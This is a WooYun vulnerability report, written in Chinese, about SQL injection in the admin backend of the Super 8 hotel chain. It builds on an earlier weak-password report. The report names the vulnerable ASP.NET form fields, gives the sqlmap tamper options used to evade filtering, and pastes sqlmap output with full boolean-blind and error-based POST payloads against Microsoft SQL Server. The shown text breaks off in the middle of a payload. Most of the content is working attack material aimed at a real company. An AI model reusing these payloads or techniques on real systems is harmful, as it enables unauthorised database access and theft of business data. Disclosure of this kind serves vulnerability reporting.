WooYun: 速8酒店某后台管理系统存在弱口令(可修改所有酒店地址/负责人/应商等信息)
这里洞主已经列出了,可以可修改所有酒店地址/负责人/应商等信息,我就不来了,我来个后台找找注入的地方!
加--tamper between.py,randomcase.py,space2comment.py --dbms "Microsoft SQL Server"测试
1、第一处:新闻分类管理搜索
ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedSearch$txtWatermarked存在注入。
2、自定义表单管理(高级查询)
ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtFormName、
ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtDescription、
ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtCreateUserName、
ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtLastModifyUserName均存在注入
自定义表单管理(搜索)
ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery$txtWatermarked存在注入
<code>sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery
$txtWatermarked
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __EVENTTARGET=ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$b
tnQuery&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMjA3ODgzNDEyMw8WBB4KUXVlcnlTdGF0ZQs
pZVN1cGVyOC5FbnRpdHkuQ29tbW9uLlF1ZXJ5U3RhdGUsIFN1cGVyOC5FbnRpdHksIFZlcnNpb249MS4
wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1udWxsAR4OT3JkZXJDb25kaXRpb24
FGFN0YXRlIERFU0MsVGhlT3JkZXIgREVTQxYCZg9kFgJmD2QWAgIDD2QWAgIGD2QWAgIDD2QWCAIBD2Q
WDAIDDw8WAh4HRW5hYmxlZGhkZAIFDw8WAh8CaGRkAgcPDxYCHwJoZGQCCQ8PFgIfAmhkZAILDw8WAh8
CaGRkAhUPDxYCHg1XYXRlcm1hcmtUZXh0BRXor7fovpPlhaXmn6Xor6LmnaHku7ZkFgJmD2QWAgIDDxY
CHwMFFeivt+i+k+WFpeafpeivouadoeS7tmQCAw88KwARAwAPFgweC18hRGF0YUJvdW5kZx4PQWxsU2V
sZWN0VmFsdWVzMswBAAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJ
pYy5MaXN0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU
9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemU
IX3ZlcnNpb24GAAAICAkCAAAAAAAAAAAAAAARAgAAAAAAAAALHgtfIUl0ZW1Db3VudAIBHi9Fc29mdF9
fU21hcnRHcmlkVmlld19fU21hcnRSYWRpb0J1dHRvbkdyb3VwTmFtZQUWU21hcnRSYWRpb0J1dHRvbkN
vbHVtbh4RSXNFbXB0eURhdGFTb3VyY2VoHghyb3dDb3VudAIBZAEQFgAWABYADBQrAAAWAmYPZBYIAgE
PD2QWAh4Kb25kYmxjbGljawW6A2lmKGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdDb250ZW50UGxhY2V
Ib2xkZXIxX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCTl9Gb3JtX2N0bDAwXzAnKS5jaGVja2VkKXtyZXR
1cm47fWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdDb250ZW50UGxhY2VIb2xkZXIxX0NvbnRlbnRQbGF
jZUhvbGRlcjJfZ3ZCTl9Gb3JtX2N0bDAwXzAnKS5jaGVja2VkPSFkb2N1bWVudC5nZXRFbGVtZW50Qnl
JZCgnQ29udGVudFBsYWNlSG9sZGVyMV9Db250ZW50UGxhY2VIb2xkZXIyX2d2Qk5fRm9ybV9jdGwwMF8
wJykuY2hlY2tlZDtfX2RvUG9zdEJhY2soJ2N0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29
udGVudFBsYWNlSG9sZGVyMiRndkJOX0Zvcm0kY3RsMDIkY3RsMDAnLCdDb250ZW50UGxhY2VIb2xkZXI
xX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCTl9Gb3JtX2N0bDAwXzAnKTsWEmYPZBYCZg8QDxYCHh5Fc29
mdF9fU21hcnRSYWRpb0J1dHRvbl9fVmFsdWUFIDVDQjYzOEIxMDc5OTQyMTJBNjc4MjgxQ0ZBNDM1N0I
zFgIeBXN0eWxlBQlib3JkZXI6MDtkZGQCAQ9kFgJmDxYCHgRUZXh0BQExZAICD2QWAgIBDw8WBB8NBSL
pgJ845Lit5Zu95Lia5Li75ruh5oSP5bqm6LCD5p+l6KGoHg9Db21tYW5kQXJndW1lbnQFIDVDQjYzOEI
xMDc5OTQyMTJBNjc4MjgxQ0ZBNDM1N0IzZGQCAw9kFgJmDxUBEzIwMTMtMTAtMjkgMTQ6MjQ6MDZkAgQ
PZBYCZg8VAQVhZG1pbmQCBQ9kFgJmDxUBEzIwMTMtMTAtMjkgMTQ6MjQ6MDZkAgYPZBYCZg8VAQVhZG1
pbmQCBw9kFgJmDxUBAGQCCA9kFgICAQ8PFgYfDQUJ5Y+v57yW6L6RHglGb3JlQ29sb3IKjQEeBF8hU0I
CBGRkAgIPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHxFoZGQCBA9kFgJmD2QWAmYPZBYCZg9kFgICAQ9kFgI
CAg9kFghmDw8WAh8CaGRkAgEPDxYCHwJoZGQCAg8PFgIfAmhkZAIDDw8WAh8CaGRkAgcPZBYCAgMPZBY
CZg9kFgICAw9kFggCBQ9kFgRmDw8WBB4eRXNvZnRfX1NtYXJ0Q2FsZW5kYXJfX1RhcmdldElEBQdzY1J
pZ2h0Hw0FCjIwMTUtMDctMjhkZAICDw8WBB8SBQZzY0xlZnQfDQUKMjAxNS0wOC0xMWRkAgcPZBYEZg8
PFgQfEgUHc2NSaWdodB8NBQoyMDE1LTA4LTA1ZGQCAg8PFgQfEgUGc2NMZWZ0Hw0FCjIwMTUtMDgtMDZ
kZAIND2QWBGYPDxYCHw0FATFkZAICDw8WAh8NBQE1ZGQCDw8QDxYGHg1EYXRhVGV4dEZpZWxkBQVWYWx
1ZR4ORGF0YVZhbHVlRmllbGQFBVZhbHVlHwRnZBAVDA0tLeivt+mAieaLqS0tCeW3suWIoOmZpAnlt7L
lgZznlKgJ5bey5ZCv55SoCeWPr+e8lui+kQnlt7LnlJ/mlYgJ5b6F5a6h5qC4CeW3suWuoeaguAnlt7L
mi5Lnu50J5pyq5a6M5oiQCeW3suWujOaIkAnlt7Lmj5DkuqQVDAAJ5bey5Yig6ZmkCeW3suWBnOeUqAn
lt7LlkK/nlKgJ5Y+v57yW6L6RCeW3sueUn+aViAnlvoXlrqHmoLgJ5bey5a6h5qC4CeW3suaLkue7nQn
mnKrlrozmiJAJ5bey5a6M5oiQCeW3suaPkOS6pBQrAwxnZ2dnZ2dnZ2dnZ2dkZAIND2QWAgIDD2QWAmY
PZBYCAgMPZBYEAgEPEGQQFQYM6KGo5Y2V5ZCN56ewBuaPj+i/sAzliJvlu7rml7bpl7QS5pyA5ZCO5L+
u5pS55pe26Ze0EuWIm+W7uueUqOaIt+WQjeensBjmnIDlkI7kv67mlLnnlKjmiLflkI3np7AVBghGb3J
tTmFtZQtEZXNjcmlwdGlvbgpDcmVhdGVUaW1lDkxhc3RNb2RpZnlUaW1lDkNyZWF0ZVVzZXJOYW1lEkx
hc3RNb2RpZnlVc2VyTmFtZRQrAwZnZ2dnZ2dkZAILDxBkDxYCZgIBFgIQBQ7nirbmgIEgIOWAkuW6jwU
FU3RhdGVnEAUR5o6S5bqP5Y+3ICDlgJLluo8FCFRoZU9yZGVyZ2RkGAIFHl9fQ29udHJvbHNSZXF1aXJ
lUG9zdEJhY2tLZXlfXxYKBUFjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGF
jZUhvbGRlcjIkY2JBbGxvd1BhZ2luZwVJY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb25
0ZW50UGxhY2VIb2xkZXIyJGd2Qk5fRm9ybSRjdGwwMiRjdGwwMAVJY3RsMDAkY3RsMDAkQ29udGVudFB
sYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGd2Qk5fRm9ybSRjdGwwMiRjdGwwMAVFY3RsMDA
kY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGlidG5BZHZhbmNlZFF
1ZXJ5BUBjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkaWJ
0bk9yZGVyaW5nBUBjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGR
lcjIkbGJPcmRlcmluZ05vBT5jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGF
jZUhvbGRlcjIkcmJ0bkFzY2VuZAU+Y3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW5
0UGxhY2VIb2xkZXIyJHJidG5Bc2NlbmQFP2N0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29
udGVudFBsYWNlSG9sZGVyMiRyYnRuRGVzY2VuZAVBY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGV
yMSRDb250ZW50UGxhY2VIb2xkZXIyJGxiT3JkZXJpbmdZZXMFPWN0bDAwJGN0bDAwJENvbnRlbnRQbGF
jZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJOX0Zvcm0PPCsADAEIAgFklWH+I+vFQIbXQHw
fSRoxmfe8PlbafmYMf6uKxxomWtg=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder
2$wtxtAdvancedQuery$txtWatermarked=1%' AND 9113=9113 AND '%'='&ctl00$ctl00$Conte
ntPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery$TextBoxWatermarkExtender1_C
lientState=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$cbAllowPaging=on
&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$hfOrdering=&ctl00$ctl00$Con
tentPlaceHolder1$ContentPlaceHolder2$Order=rbtnDescend&ctl00$ctl00$ContentPlaceH
older1$ContentPlaceHolder2$lbOrderingYes=State&ctl00$ctl00$ContentPlaceHolder1$C
ontentPlaceHolder2$lbOrderingYes=TheOrder&ctl00$ctl00$ContentPlaceHolder1$Conten
tPlaceHolder2$hfAdvancedQuery=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolde
r2$txtFormName=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtDescript
ion=2&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scLeft=20
15-07-28&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scRigh
t=2015-08-11&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModifyTim
e$scLeft=2015-08-05&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastMo
difyTime$scRight=2015-08-06&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$
txtCreateUserName=3&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtLastM
odifyUserName=4&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$s
cLeft=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scRight=5
&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ddlState=
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __EVENTTARGET=ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$b
tnQuery&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMjA3ODgzNDEyMw8WBB4KUXVlcnlTdGF0ZQs
pZVN1cGVyOC5FbnRpdHkuQ29tbW9uLlF1ZXJ5U3RhdGUsIFN1cGVyOC5FbnRpdHksIFZlcnNpb249MS4
wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCB